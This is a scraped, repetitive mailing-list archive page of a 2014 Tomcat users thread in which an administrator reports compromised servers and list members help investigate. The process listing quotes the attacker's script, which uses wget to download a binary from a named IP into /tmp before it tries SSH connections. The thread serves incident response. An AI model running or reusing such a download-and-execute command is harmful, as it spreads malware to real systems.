all for replying me.
Regards,
Leonardo
Saludos.-
Leonardo Santagostini
http://ar.linkedin.com/in/santagostini
2014-05-05 15:39 GMT-03:00 Martin Gainty mgai...@hotmail.com:
Subject: Re: Regarding i think an intrusion
From: lsantagost...@gmail.com
To: users@tomcat.apache.org
.
Regards,
Leonardo
Saludos.-
Leonardo Santagostini
http://ar.linkedin.com/in/santagostini
2014-05-05 15:39 GMT-03:00 Martin Gainty mgai...@hotmail.com:
Subject: Re: Regarding i think an intrusion
From: lsantagost...@gmail.com
To: users@tomcat.apache.org
Hello Chris
://ar.linkedin.com/in/santagostini
2014-05-05 15:39 GMT-03:00 Martin Gainty mgai...@hotmail.com:
Subject: Re: Regarding i think an intrusion
From: lsantagost...@gmail.com
To: users@tomcat.apache.org
Hello Chris, but this logfile was only one day.
MGAy Caramba!
Maybe i had
...@hotmail.com:
Subject: Re: Regarding i think an intrusion
From: lsantagost...@gmail.com
To: users@tomcat.apache.org
Hello Chris, but this logfile was only one day.
MGAy Caramba!
Maybe i had a concept mismatch trying to capture the exact moment when
the
execution begins.
My
Hello all, sorry for the late, but i was in holiday from wednesday.
Ok, i make a ticket to developers for upgrading strus. They told me that
will work on that.
So, i will keep in touch with the news =)
Again, thanks all for all the support you give me.
Regards,
Leonardo
Saludos.-
Leonardo
Well thread dump is here
https://drive.google.com/file/d/0B5oeFmSS7h7EczdXMEF3eXRBSlk/edit?usp=sharing
Let me know if im missing something.
thanks !
Leonardo
Saludos.-
Leonardo Santagostini
http://ar.linkedin.com/in/santagostini
2014-05-05 9:34 GMT-03:00 Leonardo Santagostini
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256
Leonardo,
On 5/5/14, 10:29 AM, Leonardo Santagostini wrote:
Well thread dump is here
https://drive.google.com/file/d/0B5oeFmSS7h7EczdXMEF3eXRBSlk/edit?usp=sharing
Seems
like it's broken.
- -chris
-BEGIN PGP SIGNATURE-
Version: GnuPG
Ok, again its uploaded.
This is the link
https://drive.google.com/file/d/0B5oeFmSS7h7EOFE5Nk9KMmd4RFE/edit?usp=sharing
Kind regards !,
Leonardo
Saludos.-
Leonardo Santagostini
http://ar.linkedin.com/in/santagostini
2014-05-05 11:57 GMT-03:00 Christopher Schultz
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256
Leonardo,
On 5/5/14, 11:12 AM, Leonardo Santagostini wrote:
Ok, again its uploaded.
This is the link
https://drive.google.com/file/d/0B5oeFmSS7h7EOFE5Nk9KMmd4RFE/edit?usp=sharing
1/2
GiB log file? Hrm.
It doesn't even have any calls to
Hello Chris, but this logfile was only one day.
Maybe i had a concept mismatch trying to capture the exact moment when the
execution begins.
My command was
while [ true ]; do CUENTO=$(ps -fea | grep wget | grep -v grep | grep -v
127.0.0.1 | wc -l); if [ $CUENTO -gt 0 ] ; then PIDJAVA=$(ps -fea
Subject: Re: Regarding i think an intrusion
From: lsantagost...@gmail.com
To: users@tomcat.apache.org
Hello Chris, but this logfile was only one day.
MGAy Caramba!
Maybe i had a concept mismatch trying to capture the exact moment when the
execution begins.
My command was
while
2014-04-30 19:07 GMT+02:00 Christopher Schultz ch...@christopherschultz.net
:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256
Leonardo,
On 4/30/14, 12:48 PM, Leonardo Santagostini wrote:
Im uploading mi logfiles so it will be available when finished
uploading.
Remember to get a thread
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256
Cédric,
On 5/1/14, 10:00 AM, Cédric Couralet wrote:
2014-04-30 19:07 GMT+02:00 Christopher Schultz
ch...@christopherschultz.net
:
Leonardo,
On 4/30/14, 12:48 PM, Leonardo Santagostini wrote:
Im uploading mi logfiles so it will be
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256
Konstantin,
On 4/29/14, 4:54 PM, Konstantin Kolinko wrote:
2014-04-30 0:41 GMT+04:00 Leonardo Santagostini
lsantagost...@gmail.com:
Hello Dan,
Nop, the attacker is executing locally the following
tomcat8882 1 0 Apr27 ?
Ok, i will do the following:
1) thread dump of running tomcat instance
2) Pastebin the running tomcat config
I think at mid day will have all the info.
Thanks all for replying me and all the responses.
Regards, Leonardo
Saludos.-
Leonardo Santagostini
http://ar.linkedin.com/in/santagostini
Hello list,
well my homework is done
Here are the links:
setenv.sh: http://pastebin.com/EN1mXDFi
catalina.sh: http://pastebin.com/1vRVLbSm
web.xml: http://pastebin.com/BqEfiXXm
server.xml: http://pastebin.com/wfzE8bYU
logging.properties: http://pastebin.com/Qurk8sLU
catalina.properties:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256
Leonardo,
You need to post a thread dump as well.
- -chris
On 4/30/14, 11:35 AM, Leonardo Santagostini wrote:
Hello list,
well my homework is done
Here are the links:
setenv.sh: http://pastebin.com/EN1mXDFi catalina.sh:
Date: Wed, 30 Apr 2014 12:35:52 -0300
Subject: Re: Regarding i think an intrusion
From: lsantagost...@gmail.com
To: users@tomcat.apache.org
Hello list,
well my homework is done
Here are the links:
setenv.sh: http://pastebin.com/EN1mXDFi
catalina.sh: http://pastebin.com/1vRVLbSm
On 30. April 2014 17:35:52 MESZ, Leonardo Santagostini
lsantagost...@gmail.com wrote:
Hello list,
well my homework is done
Here are the links:
setenv.sh: http://pastebin.com/EN1mXDFi
catalina.sh: http://pastebin.com/1vRVLbSm
web.xml: http://pastebin.com/BqEfiXXm
server.xml:
Hello Martin/Felix,
Im uploading mi logfiles so it will be available when finished uploading.
Regarding the configuration, its working in two other sites without
problem, and there is no problem putting L4 balancing with haproxy.
I have asked developers about that exploit, still without answer.
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256
Leonardo,
On 4/30/14, 12:48 PM, Leonardo Santagostini wrote:
Im uploading mi logfiles so it will be available when finished
uploading.
Remember to get a thread dump while Runtime.exec() is running.
You should copy the script /tmp/4.sh somewhere
Hello Christopher, thanks for your response.
I have a copy of 4.sh and squid (binary ELF file) and tried to see using
strings what this program do. I couldn’t see anything =(
Im monitoring the server for getting a dump at the moment this injection
occurs.
Files still uploanding =(
Thanks for
Hi,
I am learning to set up a server and I found this article about security
http://mon-serveur.anael.eu/doku.php/securite/firewall_iptables
On Tue, Apr 29, 2014 at 9:08 PM, Leonardo Santagostini
lsantagost...@gmail.com wrote:
Hello list,
Im facing an issue in 6 tomcat server that are
On Apr 29, 2014, at 12:08 PM, Leonardo Santagostini lsantagost...@gmail.com
wrote:
Hello list,
Im facing an issue in 6 tomcat server that are getting penetrated and they
are executing malicious scripts on my server.
Can you share more about what they are doing? It might give some clues as
Hello Dan,
Nop, the attacker is executing locally the following
tomcat8882 1 0 Apr27 ?00:00:00 sh /tmp/4.sh
tomcat8893 8882 0 Apr27 ?00:00:00 wget
http://218.199.102.59/.xy/squid32 -O /tmp/squid
And the launch squid who tries to connect via ssh to varoius places.
sorry, but i forget to post
/usr/java/default/bin/java -version
java version 1.6.0_41
Java(TM) SE Runtime Environment (build 1.6.0_41-b02)
Java HotSpot(TM) 64-Bit Server VM (build 20.14-b01, mixed mode)
Saludos.-
Leonardo Santagostini
http://ar.linkedin.com/in/santagostini
2014-04-29
2014-04-30 0:41 GMT+04:00 Leonardo Santagostini lsantagost...@gmail.com:
Hello Dan,
Nop, the attacker is executing locally the following
tomcat8882 1 0 Apr27 ?00:00:00 sh /tmp/4.sh
tomcat8893 8882 0 Apr27 ?00:00:00 wget
http://218.199.102.59/.xy/squid32 -O
27 matches
Mail list logo
